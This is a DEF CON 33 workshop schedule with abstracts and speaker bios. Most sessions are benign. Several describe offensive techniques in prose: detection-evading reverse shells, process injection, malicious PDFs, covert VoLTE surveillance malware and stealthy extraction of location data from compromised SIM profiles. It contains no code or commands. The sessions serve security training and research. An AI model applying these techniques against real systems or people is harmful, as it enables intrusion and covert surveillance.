Detection techniques, anomaly signals, and defensive engineering against malicious SIM profile abuse.

Live demonstration on extracting call metadata and geolocation from compromised profiles without raising alarms.


People:
    SpeakerBio:  Ravi Rajput
No BIO available



Malware and Monsters

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-303 (Malware Village)
When:  Saturday, Aug 9, 10:00 – 13:45 PDT

Creator: Malware Village

Ready to multiclass from D&D player to educational game master?

This hands-on train-the-trainer workshop teaches experienced tabletop gamers the specialized skills needed to facilitate epic learning sessions using the Malware & Monsters framework.

Through guided gameplay with pre-built characters and comprehensive facilitator guides, you’ll master advanced IM techniques for educational environments—from managing player dynamics to controlling session flow and handling those inevitable “but what if I cast fireball?” moments in a learning context.

No cybersecurity teaching experience required; we’re focusing purely on leveling up your facilitation skills.

Earn your “official” Incident Master license and walk away with a complete facilitator toolkit, proven techniques, and the confidence to run engaging educational gaming sessions that would make even the most veteran DM proud.


People:
    SpeakerBio:  Klaus Agnoletti
No BIO available
SpeakerBio:  Glen Sorensen, Virtual Chief Information Security Officer (vCISO) and Managing Director at Cyber Risk Opportunities

Glen Sorensen is a Virtual Chief Information Security Officer (vCISO) and Managing Director with Cyber Risk Opportunities. He has worn numerous hats in his career, in areas such as security engineering and architecture, security operations, GRC, and leadership. He has held a variety of roles as an analyst, engineer, consultant, auditor, regulator, and information security officer for a financial institution.

Glen approaches problems with practical solutions that bring good business value and has worked across many sectors, including financial services, healthcare, manufacturing, and others. He has served as a consulting expert in a large legal case involving healthcare and cyber attack detection technology. He has been in IT and security for 15+ years, longer if you count years of misspent youth bending technology and countless hours of roleplaying games. He is a sucker for a good tabletop exercise and serves as an Incident Master for HackBack Gaming, the fun kind of TTX.




Malware Attack in PDFs: An Adversary Real Attack Analysis

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-702 (Adversary Village)-Workshop Area
When:  Saturday, Aug 9, 15:00 – 16:59 PDT

Creator: Adversary Village

This Workshop delves deep into the intricate structures of PDF files, offering a meticulous analysis of each segment. Unveiling the covert strategies of threat actors, we explore how they ingeniously incorporate malicious components into file structures. The session elucidates the meticulous collection of IOCs (Indicators of Compromise) and the construction of IOAs (Indicators of Attack) for behavioral analysis, empowering defenders to anticipate and thwart novel attack vectors. Our technical journey navigates through the PDF file’s anatomy, encompassing headers, bodies, cross-reference tables, and trailers. Live demonstrations dissect malicious PDFs using tools like pdfid, pdf-parser, and pdftk, providing hands-on insights into the analysis process. The presentation unravels encoding techniques and exposes threat actors’ methodologies in establishing Command and Control (C&C) channels within PDF files. The session concludes with an opportunity for questions, equipping participants with advanced knowledge for robust malware analysis and proactive defense strategies.

Links:
    adversaryvillage.org/adversary-events/DEFCON-33/Filipi-Pires/ – https://adversaryvillage.org/adversary-events/DEFCON-33/Filipi-Pires/

People:
    SpeakerBio:  Filipi Pires, Head of Identity Threat Labs and Global Product Advocate at Segura

I’ve been working as Head of Identity Threat Labs and Global Product Advocate at Segura®, Red Team Village Director, Senior Advisor Raices Cyber Academy, Founder of Red Team Community (Brazil and LATAM), AWS Community Builder, Snyk Ambassador, Application Security Specialist and Hacking is NOT a crime Advocate. International Speaker at Security and New technologies events in many countries such as US (Black Hat & Defcon), Canada, France, Spain, Germany, Poland, Black Hat MEA – Middle-East – and others, I’ve served as University Professor in Graduation and MBA courses at Brazilian colleges, in addition, I’m Creator and Instructor of the Course – Malware Attack Types with Kill Chain Methodology (PentestMagazine), PowerShell and Windows for Red Teamers(PentestMagazine) and Malware Analysis – Fundamentals (HackerSec).




Malware Exploitation in PDFs: A Red Team Perspective

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 2
When:  Saturday, Aug 9, 11:00 – 11:50 PDT

Creator: Red Team Village

Join us for an in-depth exploration of how PDFs, a ubiquitous document format, can be exploited as a vessel for executing malicious JavaScript malware. This presentation will delve into real-world vulnerabilities that have been targeted to execute harmful code within PDF files—posing a serious threat in today’s cybersecurity landscape.

Key exploit techniques we’ll explore include:

Heap Spray Attacks: Using shellcode to strategically overwrite memory, thereby enabling attackers to execute arbitrary code and gain control over target systems.

Data Exfiltration Tactics: Methods for covertly extracting critical information, such as email addresses and system details, from users without their knowledge or consent.

Embedding Malware in PDFs: An examination of how attackers embed harmful scripts into PDFs, tricking users into activating exploits within Adobe Reader through seemingly ordinary actions.

We’ll dissect malicious actions such as shellcode injection, buffer overflow attacks, Adobe Reader exploit, and memory manipulation, all designed to execute malware effectively.

This session is perfect for offensive security professionals seeking to deepen their understanding of PDF-based exploits and enhance their penetration testing and threat emulation capabilities. Discover how these sophisticated threats operate and learn strategies to counteract them within your security frameworks. Join us to stay ahead in the ever-evolving world of cyber threats.

More information about the presentation can be found in this article – https://labs.senhasegura.blog/unmasking-the-threat-a-deep-dive-into-the-pdf-malicious-2/


People:
    SpeakerBio:  Filipi Pires, Head of Identity Threat Labs and Global Product Advocate at Segura

I’ve been working as Head of Identity Threat Labs and Global Product Advocate at Segura®, Red Team Village Director, Senior Advisor Raices Cyber Academy, Founder of Red Team Community (Brazil and LATAM), AWS Community Builder, Snyk Ambassador, Application Security Specialist and Hacking is NOT a crime Advocate. International Speaker at Security and New technologies events in many countries such as US (Black Hat & Defcon), Canada, France, Spain, Germany, Poland, Black Hat MEA – Middle-East – and others, I’ve served as University Professor in Graduation and MBA courses at Brazilian colleges, in addition, I’m Creator and Instructor of the Course – Malware Attack Types with Kill Chain Methodology (PentestMagazine), PowerShell and Windows for Red Teamers(PentestMagazine) and Malware Analysis – Fundamentals (HackerSec).




Mastering Frontend Security: A Hands-On Workshop to Engineer XSS-Proof Web Applications

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-604 (AppSec Village)-Classroom
When:  Friday, Aug 8, 15:30 – 17:59 PDT

Creator: AppSec Village

Cross-site scripting (XSS) remains a critical threat to web applications. This intensive, hands-on training session moves beyond theory to empower you to transform your web application codebase into a bastion of security, adhering to the rigorous standards pioneered at Google. We will equip you with the practical skills and tools to implement a defense-in-depth strategy, aiming for a future where XSS is a mitigated threat.

In this workshop, you won’t just hear about solutions; you’ll actively implement them. We will guide you through the step-by-step deployment of Google’s most effective runtime protections against XSS—strict Content Security Policy and Trusted Types—drawing from our experience rolling these out across hundreds of products serving billions of users. You’ll learn to integrate these with powerful compile-time protections to create a comprehensive security posture.


People:
    SpeakerBio:  Aaron Shim

Aaron is a Senior Software Engineer at Google working on product security across all of Google’s user facing webapps. Bridging the gap between security and development work, he has worked on product teams at both Google and Microsoft in the past, including Docs, GCP, and Visual Studio. He is extremely passionate about the developer experience and committed to empowering every dev to build the most secure and delightful products.

SpeakerBio:  Mayra Robles

Mayra Robles is a Software Engineer on Google’s Information Security team. She specializes in web security and the protection of agentic systems. As an intern, she focused on making Trusted Types more user-friendly, debuggable, and easier to deploy at scale. Before focusing on security, she completed two internships at Microsoft, where she worked on user-facing features and pioneered workflows for AI-powered productivity interactions in the Edge browser. A native of Ciudad Juarez, Mexico, and a graduate of the University of Texas at El Paso, Mayra now lives in New York City and enjoys the local theater scene.




Matter Playground

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-401 (Embedded Systems Village)
When:  Sunday, Aug 10, 10:00 – 11:59 PDT
Friday, Aug 8, 10:00 – 17:59 PDT
Saturday, Aug 9, 10:00 – 17:59 PDT

Creator: Embedded Systems Village



MHV Badge 101

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-504 (Maritime Hacking Village)-Workshop Area
When:  Friday, Aug 8, 14:00 – 14:59 PDT

Creator: Maritime Hacking Village

A great badge needs a great workshop on how to make the most of it. MHV’s badge for DC33 is an open-source embedded system for maritime security research, featuring interfaces for NMEA2000, NMEA0183, Modbus RTU, and CAN bus with unprecedented symbol-level CAN fault injection capabilities. Join us for a technical workshop on how to use the badge to hack on maritime systems!


People:
    SpeakerBio:  Nick Halt
No BIO available



MITRE iCaldera: Purple Teaming in the Future

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-702 (Adversary Village)-Workshop Area
When:  Saturday, Aug 9, 10:00 – 11:59 PDT

Creator: Adversary Village

The rapid advancement of large language models (LLMs) is reshaping the landscape of cybersecurity. These models are not only achieving higher benchmarks in math, coding, and cybersecurity tasks but are also being leveraged by threat actors to enhance resource development and social engineering capabilities. As LLMs continue to evolve, what could autonomous cyber capabilities powered by these models look like? How can we responsibly harness their potential for adversary emulation and defense? In this talk, we will explore the integration of LLMs into MITRE Caldera, a scalable automated adversary emulation platform, and investigate how these models can transform adversary emulation through three distinct paradigms: as planners, as factories for constructing custom cyber abilities, and as forward-deployed autonomous agents. Drawing on existing research, including papers on LLM-assisted malware development and benchmarks for offensive cyber operations, we will examine the capabilities of LLMs in generating plausible emulations of advanced persistent threats (APTs).

The session will feature live demonstrations showcasing how LLMs can replicate adversary profiles, construct new cyber abilities on the fly, and autonomously execute emulation tasks. Attendees will gain insights into the performance of these paradigms, their implications for purple teaming, and the challenges of maintaining realistic emulations. Finally, we will look ahead to the future of adversary emulation, discussing how APTs might leverage autonomous or semi-autonomous LLM capabilities in practice and the role of increasingly powerful models in shaping the next generation of cybersecurity tools. Whether you’re a defender, researcher, or technologist, this talk will provide a compelling glimpse into the possibilities and risks of LLM-enabled adversary emulation.

Links:
    adversaryvillage.org/adversary-events/DEFCON-33/Ethan-Michalak/ – https://adversaryvillage.org/adversary-events/DEFCON-33/Ethan-Michalak/
    adversaryvillage.org/adversary-events/DEFCON-33/Mark%20Perry – https://adversaryvillage.org/adversary-events/DEFCON-33/Mark%20Perry

People:
    SpeakerBio:  Ethan Michalak, Cybersecurity engineer | MITRE | Caldera contributor

Ethan Michalak is a cybersecurity engineer and an avid CTF player. Ethan pursues efforts in adversary emulation, detection engineering, and malware development. In his free time, Ethan plays video games, reads a book, or makes a cocktail.

SpeakerBio:  Mark Perry, Lead Applied Cyber Security Engineer at MITRE Corp

Mark Perry is a Lead Applied Cyber Security Engineer at MITRE Corp, where he specializes in adversary emulation and work development. With a robust background in infrastructure and cyber security frameworks, Mark brings extensive expertise to his role, focusing on fortifying systems against sophisticated cyber threats. He has worked on projects involving adversary emulation, red teaming, cyber threat intelligence, and software development. Mark also leads development and delivery of Caldera workshops, providing participants with practical, hands-on training utilizing cybersecurity techniques. Additionally, he actively promotes Caldera’s benefactor program, fostering community support and engagement to further the development of cybersecurity tools and resources. Outside of his professional endeavors, Mark enjoys traveling and is a supercar enthusiast.




ModuleOverride – Changing a Tyre Whilst Driving

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 3
When:  Friday, Aug 8, 14:00 – 14:50 PDT

Creator: Red Team Village

This hands-on workshop introduces ModuleOverride, a novel technique for process injection, enabling the reuse of existing memory sections to inject and execute malicious shellcode within running Windows processes.

Participants will explore key challenges in security research and development, examining how certain constraints in shellcode generation—such as the inability to specify an exit function—can drive creative solutions, like dynamically patching shellcode within an active process during injection.

Attendees will engage in live demonstrations and interactive exercises, gaining first-hand experience as we walk through the final phase of the research, tackling technical hurdles encountered during development to ensure a successful process injection.

We’ll also hold an open discussion on detection strategies, encouraging participants to brainstorm and explore possible ways to identify ModuleOverride.


People:
    SpeakerBio:  Alessandro Grisa

Alessandro Grisa is a member of CovertSwarm’s Red Team Hive, focusing on malware development and exploring Windows internals. He also has a passion for hardware hacking and enjoys reverse engineering embedded devices. In his spare time, he plays the drums, plays tennis and spends time in the mountains.

SpeakerBio:  Ibai Castells

Red Teamer and offensive security nerd obsessed with AD exploits, privilege escalation, and building custom offensive tooling.




Morning meditation

Creator Talk Map Page – LVCC West-Level 2-W205 (The Diana Initiative Community)
When:  Sunday, Aug 10, 10:15 – 10:45 PDT

Creator: The Diana Initiative

Come join us for morning meditation. This workshop is inclusive of all bodies. EveryBODY is Welcome here. Meditation can help quiet the mind, manage stress, and enhance overall emotional well-being, making it a great way to start the day.


People:
    SpeakerBio:  Megan Allen

Hi, I’m Megan Allen.

My work focuses on a holistic approach to health; moving the body’s natural energy into alignment with Earth and the seven chakras. I practice integrative wellness – honoring a person’s emotional, mental, physical and spiritual well-being. I provide intuitive healing sessions and work with clients to relax the mind, increase body awareness and balance energy flow.

I also facilitate community wellness workshops, ceremonies and transformational group programs inviting participants to disconnect from their busy lives, turn inward and tap into the present to restore and maintain the body’s energetic balance and cultivate self-love, empowerment and sovereignty.

I inspire people to activate their highest potential in alignment with their wise hearts and to promote healing from within. I tailor my sessions to reflect this; using techniques from my healing disciplines as well as my love for Traditional Chinese Medicine, holistic aromatherapy, crystals and essential oils, tarot, animal medicine cards and a deep reverence for nature.

Nature is one of my greatest teachers. It constantly teaches me about grounding, stability, resilience, boundaries, growth, and stillness.




Morning meditation

Creator Talk Map Page – LVCC West-Level 2-W205 (The Diana Initiative Community)
When:  Saturday, Aug 9, 10:15 – 10:45 PDT

Creator: The Diana Initiative

Come join us for morning meditation. This workshop is inclusive of all bodies. EveryBODY is Welcome here. Meditation can help quiet the mind, manage stress, and enhance overall emotional well-being, making it a great way to start the day.


People:
    SpeakerBio:  Megan Allen

Hi, I’m Megan Allen.

My work focuses on a holistic approach to health; moving the body’s natural energy into alignment with Earth and the seven chakras. I practice integrative wellness – honoring a person’s emotional, mental, physical and spiritual well-being. I provide intuitive healing sessions and work with clients to relax the mind, increase body awareness and balance energy flow.

I also facilitate community wellness workshops, ceremonies and transformational group programs inviting participants to disconnect from their busy lives, turn inward and tap into the present to restore and maintain the body’s energetic balance and cultivate self-love, empowerment and sovereignty.

I inspire people to activate their highest potential in alignment with their wise hearts and to promote healing from within. I tailor my sessions to reflect this; using techniques from my healing disciplines as well as my love for Traditional Chinese Medicine, holistic aromatherapy, crystals and essential oils, tarot, animal medicine cards and a deep reverence for nature.

Nature is one of my greatest teachers. It constantly teaches me about grounding, stability, resilience, boundaries, growth, and stillness.




Morning meditation

Creator Talk Map Page – LVCC West-Level 2-W205 (The Diana Initiative Community)
When:  Friday, Aug 8, 10:15 – 10:45 PDT

Creator: The Diana Initiative

Come join us for morning meditation. This workshop is inclusive of all bodies. EveryBODY is Welcome here. Meditation can help quiet the mind, manage stress, and enhance overall emotional well-being, making it a great way to start the day.


People:
    SpeakerBio:  Megan Allen

Hi, I’m Megan Allen.

My work focuses on a holistic approach to health; moving the body’s natural energy into alignment with Earth and the seven chakras. I practice integrative wellness – honoring a person’s emotional, mental, physical and spiritual well-being. I provide intuitive healing sessions and work with clients to relax the mind, increase body awareness and balance energy flow.

I also facilitate community wellness workshops, ceremonies and transformational group programs inviting participants to disconnect from their busy lives, turn inward and tap into the present to restore and maintain the body’s energetic balance and cultivate self-love, empowerment and sovereignty.

I inspire people to activate their highest potential in alignment with their wise hearts and to promote healing from within. I tailor my sessions to reflect this; using techniques from my healing disciplines as well as my love for Traditional Chinese Medicine, holistic aromatherapy, crystals and essential oils, tarot, animal medicine cards and a deep reverence for nature.

Nature is one of my greatest teachers. It constantly teaches me about grounding, stability, resilience, boundaries, growth, and stillness.




Nuclei: Beyond The Basic Templates

Creator Talk Map Page – LVCC West-Level 3-W326 (Bug Bounty Village)
When:  Friday, Aug 8, 12:00 – 12:59 PDT

Creator: Bug Bounty Village

Nuclei has become a game-changing tool for hackers worldwide, transforming how we discover vulnerabilities and hack at scale. This workshop explores why Nuclei is dominating the bug bounty scene and how it’s evolving the art of automated hacking. We’ll dive into how this open-source powerhouse lets hackers scan thousands of targets, write custom templates, and find bugs that automated scanners miss.


People:
    SpeakerBio:  Ben “nahamsec” Sadeghipour, Co-Founder & CEO at HackingHub

Ben Sadeghipour, better known as NahamSec, is an ethical hacker, content creator, and keynote speaker. Over his career, Ben has uncovered thousands of security vulnerabilities for major organizations, including Amazon, Apple, Zoom, Meta, Google, and the U.S. Department of Defense. As a top-ranked bug bounty hunter, he is deeply passionate about cybersecurity education, regularly sharing his knowledge through his popular YouTube channel and speaking at major conferences like DEFCON and BSides. Beyond his personal achievements, Ben is committed to building the security community, organizing events that foster collaboration, innovation, and the next generation of offensive security professionals.

SpeakerBio:  Adam “BuildHackSecure” Langley, CTO at HackingHub

For over 20 years, Adam has balanced the worlds of application security and web development. He currently serves as the CTO of HackingHub and the Director of BSides Exeter. Over the past five years, he has combined his expertise to create and deliver gamified educational content, aimed at teaching the next generation of ethical hackers and developers about web application security.




Oblivious Access to Blockchains

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 4-Communities-C101 (Cryptocurrency Community)
When:  Saturday, Aug 9, 14:00 – 15:50 PDT

Creator: Cryptocurrency Community

Accesses to the blockchain’s state and logs leak highly sensitive information such as the user’s identity, who it is trading with, and which crypto-asset the user is interested in trading. In this tutorial, we will go over two technologies for ensuring access pattern privacy, including Oblivious RAM (ORAM), and Private Information Retrieval (PIR). Unlike traditional encrypted databases that protect only the contents of data, our technologies additionally protect the queries, thus hiding users’ intentions. We will describe two extremely simple constructions, one ORAM, and one PIR scheme. In particular, the ORAM algorithm is also the one used by industry leaders such as Signal and Meta. We will next show a demo for our oblivious key-value store implementation. We will also challenge the learners with a CTF problem that demonstrates how sensitive secrets can easily be leaked even when the memory contents are encrypted.


People:
    SpeakerBio:  Elaine Shi, Professor at Carnegie Mellon University

Elaine Shi is a professor at Carnegie Mellon University. Her research interests include cryptography, security, mechanism design, algorithms, foundations of blockchains, and programming languages. She is a co-founder of Oblivious Labs, Inc. Her research on Oblivious RAM and differentially private algorithms has been adopted by Signal, Meta, and Google. She is a Packard Fellow, a Sloan Fellow, an ACM Fellow, and an IACR Fellow.

SpeakerBio:  Afonso Tinoco, Carnegie Mellon University

Afonso Tinoco is a PhD candidate currently on leave from Carnegie Mellon University and University of Lisbon. His research interests include Applied Cryptography and Distributed System Verification. He is a Co-Founder and a Research Engineer at Oblivious Labs, Inc. (https://obliviouslabs.com). Oblivious Labs’ mission is to develop open-source toolchains for Oblivious Computation (https://github.com/obliviouslabs/), with the goal of accelerating the wide deployment of Oblivious Computations. He is also a co-captain of STT (https://sectt.github.io/), the CTF team of University of Lisbon.




Old Tactics, New Weapons: Abusing Modern Software Stacks for Reliable Shell Access

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 3
When:  Saturday, Aug 9, 11:00 – 11:50 PDT

Creator: Red Team Village

For years, Pentestmonkey Reverse Shell Cheat Sheet defined the essentials of post-exploitation. Bash, Python, PHP, (G)Awk, Netcat and others were quick, simple and highly effective tools for gaining shell access. Today, those tools are the first to be flagged, restricted or removed. In real-world hardened environments, the old paths are closed. Meanwhile, new runtimes like Clojure, Racket, NATS-IO, Bun, Crystal, Red Language, Ballerina and others are becoming part of production environments, CI/CD pipelines and internal developer ecosystems, usually without security teams treating them as risks.

This workshop focuses on building practical, working reverse and bind shells using these modern runtimes. Participants will write their own payloads, test them live against targets and leave with working knowledge of how to survive without traditional tooling. Every shell demonstrated will be integrated into the Metasploit Framework with custom modules built for each runtime. Source code, victim and attacker virtual machines and pre-built environments will be provided to ensure every participant can practice during the session.

This is not a theory-heavy workshop. It is about operational survival when Python is gone, Netcat is restricted and standard shells are no longer viable. It is about turning runtimes that defenders ignore into reliable offensive footholds. Attendees will leave with ready-to-use payloads, working Metasploit extensions, and the technical knowledge to adapt to modern detection-heavy environments.


People:
    SpeakerBio:  Roberto Soares

With more than 10 years immersed in Information Security, he is an Information Security Engineer specializing in Red Team. His focus extends to best practices, encompassing application and infrastructure vulnerability assessments, code reviews, and a mix of static and dynamic analyses to identify vulnerabilities. In addition to his main focus, he has a strong inclination to develop offensive tools. He has contributed more than 25 modules to the core Metasploit framework and registered several CVEs. Additionally, his knowledge covers the complex landscape of macOS security. His curiosity leads him to test non-trivial scenarios, from analyzing cranes that operate containers on ships, to delving into the complexities of embedded systems (SCADA/PLC) and executing advanced attacks on computer networks, that is, his hacker spirit runs through his veins. He really enjoys breaking and fixing things that contain bits and bytes.




ONI: Shadow Surveillance via VOLTE malware

Creator Talk Map Page – LVCC West-Level 2-W224 (Telecom Village)
When:  Saturday, Aug 9, 10:00 – 11:45 PDT

Creator: Telecom Village

How VoLTE and IMS — the backbone of modern telecom voice services — can be weaponized by malware to perform stealthy, operator-blind surveillance, data exfiltration, and persistent command-and-control (C2), all without using the public internet. How a VoLTE-enabled Android device can be turned into a covert surveillance node—no SIM or live network required. Using a rooted emulator (for safe, repeatable testing) and Frida hooks, attendees will watch malware silently hijack the IMS stack, launch SIP INVITE/OPTIONS beacons to a Kamailio-based fake IMS core, and exfiltrate SMS, location, eSIM data or live audio over RTP—all traffic appearing as legitimate VoLTE signaling inside telecom infrastructure. The exercise proves how nation-grade implants can live entirely inside operator voice channels, bypassing traditional firewalls and DPI.


People:
    SpeakerBio:  Vinod Shrimali
No BIO available



Operation Europa Crisis: A Tabletop Simulation

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-606 (Biohacking Village)
When:  Saturday, Aug 9, 11:00 – 13:59 PDT

Creator: Biohacking Village

A cross-border health emergency is spreading fast and you’re on the front lines of the response. Hospitals are overwhelmed. ICU beds are full. Strange symptoms are emerging in a tight geographic cluster across southern Germany and eastern France. Supply chains are buckling, communications are failing, and trust in public health institutions is unraveling.

At the Biohacking Village during DEF CON 33, Operation Europa Crisis invites you to join a gripping, real-time tabletop challenge.

🧠 Step Into the Crisis

Take on roles such as:

– Hospital administrators
– Health ministry officials
– Crisis communication leads
– Frontline clinical staff
– Supply chain and logistics coordinators
– CBRN and incident response team

Together, you’ll investigate the cause, coordinate international response efforts, manage conflicting narratives, and navigate critical decisions in a high-pressure environment.


People:
    SpeakerBio:  Nathan Case, CSO at Clarity

Nathan Case is a cybersecurity engineer and strategist with over two decades of experience defending critical infrastructure, building secure cloud systems, and leading incident response at the highest levels. His career spans roles at Amazon Web Services, McKesson, and defense-focused startups, where he has architected platforms for healthcare, government, and national security missions. Known for his ability to bridge technical depth with real-world impact, Nathan has led global security teams, supported cyber operations across multiple countries, and advised both enterprise executives and government leaders on risk, resilience, and transformation.




OSINT for Hackers

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 4
When:  Friday, Aug 8, 12:00 – 13:50 PDT

Creator: Red Team Village

In this Workshop, attendees will learn some of the most impactful techniques and tools to increase the value of OSINT to their organizations. A guided learning experience, instructors will immerse attendees in hands-on exercises.


People:
    SpeakerBio:  Lee McWhorter

Lee McWhorter, Owner & Chief Geek at McWhorter Technologies, has been involved in IT since his early days and has over 30 years of experience. He is a highly sought after professional who first learned about identifying weaknesses in computer networks, systems, and software when Internet access was achieved using a modem. Lee holds an MBA and more than 20 industry certifications in such areas as System Admin, Networking, Programming, Linux, IoT, and Cybersecurity. His roles have ranged from the server room to the board room, and he has taught for numerous universities, commercial trainers, and nonprofits. Lee works closely with the Dark Arts Village at RSAC, Red Team Village at DEFCON, Texas Cyber Summit, CompTIA, and the CompTIA Instructor Network as a Speaker, SME, and Instructor.

SpeakerBio:  Sandra Stibbards

Sandra Stibbards opened her investigation agency, Camelot Investigations, in 1996. Currently, she maintains a private investigator license in the state of California. Sandra specializes in financial fraud investigations, competitive intelligence, counterintelligence, business and corporate espionage, physical penetration tests, online vulnerability assessments, brand protection/IP investigations, corporate due diligence, and Internet investigations. Sandra has conducted investigations internationally in five continents and clients include several Fortune 500 and international companies. Sandra has been providing training seminars and presentations on Open Source Intelligence (OSINT) internationally since 2010 to federal governments and corporations.




Play with Matter and Board the IoTrain!

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-401 (Embedded Systems Village)
When:  Friday, Aug 8, 10:00 – 17:59 PDT
Sunday, Aug 10, 10:00 – 13:59 PDT
Saturday, Aug 9, 10:00 – 17:59 PDT

Creator: Embedded Systems Village

The main goal of this booth is to introduce you to Matter, the “open-source, royalty-free smart home connectivity standard.” We have designed seven ways for you to discover and play with the Matter technology:

– Home Assistant
– Apple Home
– Google Home
– Ubuntu/Linux
– macOS
– Node.js
– Python

Once you are familiar with the basics, solve some challenges and control the IoTrain!


People:
    SpeakerBio:  Zoltan “zh4ck” Balazs, Principal Vulnerability Researcher at CUJO AI

Zoltan (@zh4ck) is a Principal Vulnerability Researcher at CUJO AI, a company focusing on smart home security. Previously he worked as a CTO for an AV Tester company, as an IT Security expert in the financial industry, and as a senior IT security consultant. He is also the developer of the Hardware Firewall Bypass Kernel Driver (HWFWBypass), the Encrypted Browser Exploit Delivery tool (#IRONSQUIRREL) and the Sandbox tester tool to test Malware Analysis Sandboxes, and is partially “responsible” for an IoT botnet infecting 600K devices.

I am a big fan of offsec certs, currently holding OSEP, OSED, OSCE, OSCP, and OSWP.




PLC Hacking 101

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 2-504 (Maritime Hacking Village)-Workshop Area
When:  Saturday, Aug 9, 13:30 – 14:59 PDT
Friday, Aug 8, 15:00 – 15:59 PDT

Creator: Maritime Hacking Village

The barrier to learning how to program PLCs using ladder logic is not as high as most people think. There are free tools available and low-cost PLC hardware or even free simulators that can be used, as well as a wealth of information online. This workshop builds from the successful offering from last year (https://github.com/brienc23/Defcon31_workshop_materials) as part of the Maritime Cyber Petting Zoo. The presenter will bring a minimum of three Allen Bradley micro820 based trainers (https://www.plccable.com/allen-bradley-micro820-analog-ccw-plc-trainer-micro800-training-kit/) with three computers loaded with Rockwell Automation’s Connected Components Workbench (CCW) software. In as little as one hour, participants will be coding on a real PLC and designing a program to control the inputs and outputs (switches and lights) on the trainers. The goal would be to invite more people into this important space of ICS/OT Security by demystifying how PLCs work.


People:
    SpeakerBio:  Brien Croteau, USNA
No BIO available



Public Speaking for Nervous Hackers

Creator Talk Map Page – LVCC West-Level 2-W205 (The Diana Initiative Community)
When:  Friday, Aug 8, 15:00 – 16:59 PDT

Creator: The Diana Initiative

Learn strategies for dealing with the physical, emotional, and logical aspects of nervousness that comes from public speaking. In a short workshop, I will walk participants through a series of quick exercises you can do to feel more relaxed and prepared before speaking about the technical topics that you love. These are adapted from exercises I used to do during Speech & Debate, and I have taught them to many mentees and coworkers with great success. As a hacker and frequent conference speaker, I know that being a confident public speaker opens many doors. Let’s get you up on stage!


People:
    SpeakerBio:  Betta Lyon-Delsordo

Betta Lyon Delsordo began her cyber journey at the age of 13 when she started teaching herself to code. This grew into freelance web development work for small businesses in Montana, where she soon realized she needed to know more about application security to keep her clients safe. She began learning more about secure coding and interned with a hacking firm, and realized she was pretty good at it. After completing a Master’s in Cybersecurity at Georgia Tech, obtaining certifications such as the GPEN, and working her way up through pentesting, Betta is now working as a Lead Application Penetration Tester at OnDefend. Her areas of expertise include application security, secure code review, cloud security, and AI hacking. Betta is very involved in the cybersecurity community and with organizations that support women in technology. She has been a mentor for 9 years with Technovation (an international girls coding program), and is an organizer and speaker for organizations promoting diversity in technology including RTC, WiCyS, WISP, and WSC.




RE for the Rest of Us: An Introduction to Reverse Engineering

Creator Talk Map Page – LVCC West-Level 3-W322-W324 (Blacks In Cyber Village)
When:  Friday, Aug 8, 15:00 – 15:59 PDT

Creator: Blacks In Cyber Village

Want to break into reverse engineering but not sure where to start? This session walks you through both software and hardware reverse engineering using an Arduino and Ghidra. We’ll run a simple C script on an Arduino that adds integer and hexadecimal values, updates register values, and toggles an LED. You’ll learn how to inspect this behavior in Ghidra, set breakpoints, and observe what’s happening at a low level. We’ll also dive into the components of the Arduino board—like the ATmega microcontroller—and explore what’s happening on the integrated circuits. No prior reverse engineering experience needed.


People:
    SpeakerBio:  Sydney Johns

Sydney Johns is a cybersecurity researcher with expertise in reverse engineering, AI for cybersecurity, vulnerability assessment, and post-quantum cryptography. Her research focuses on evaluating the security of information systems, improving computer science education, and assessing AI model performance in military decision-making contexts. She brings five years of applied experience supporting the U.S. Army Research Laboratory and the Johns Hopkins University Applied Physics Laboratory.

Sydney is currently pursuing a Ph.D. in Computer Science at Virginia Tech’s Innovation Campus, where she is a GEM Fellow. Outside of her professional work, she enjoys painting, visiting the beach, cooking, and watching anime.




Red Teaming Financial Defenses

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 4-Communities-C101 (Cryptocurrency Community)
When:  Friday, Aug 8, 12:00 – 13:50 PDT

Creator: Cryptocurrency Community

This workshop flips the script on financial security, focusing on a practical, hands-on level where attendees will learn by doing. Attendees will step into the shoes of sophisticated attackers targeting the interconnected financial ecosystem. Guided by us – Chloe, with experience in architecting B2B fraud solutions for acquiring banks in Singapore, and Weihong, with hands-on experience building ML-based KYC/liveness detection and rule-based risk systems for new user onboarding at OKX (a crypto exchange) – participants will learn how to think offensively.


People:
    SpeakerBio:  Wei Hong

Wei Hong is a machine learning practitioner with six years of experience in natural language processing and applied AI at one of the world’s largest cryptocurrency exchanges. He has contributed to projects involving KYC systems, user risk profiling, and the deployment of AI in real-world financial applications. Fascinated by blockchain development, Wei Hong is particularly interested in the intersection of decentralization, transparency, and machine learning. He is currently pursuing a Master’s in Computer Science at Georgia Tech, where he is an active member of the Blockchain Club@GT.

SpeakerBio:  Chloe Chong

Chloe is a machine learning engineer and blockchain enthusiast with five years of experience in building ML systems for fraud detection and compliance in the traditional payments and fintech industry. Outside of work, she explores blockchain development with a focus on usability and real-world applications in the payment space. Chloe is an active member of the Georgia Tech Blockchain Club and is particularly interested in how decentralized technologies can improve financial infrastructure and user experience.




Red Teaming Kubernetes: From App-Level CVEs to Full Cluster Takeover

Creator Talk Map Page – LVCC West-Level 1-Exhibit Hall 1-405 (Red Team Village)-RTV Track 3
When:  Friday, Aug 8, 13:00 – 13:50 PDT

Creator: Red Team Village

Kubernetes is the de facto operating system of the cloud, and more and more organizations are running their workloads on Kubernetes. While Kubernetes offers many benefits, it also introduces new security risks, such as cluster misconfiguration, leaked credentials, cryptojacking, container escapes, and vulnerable clusters.

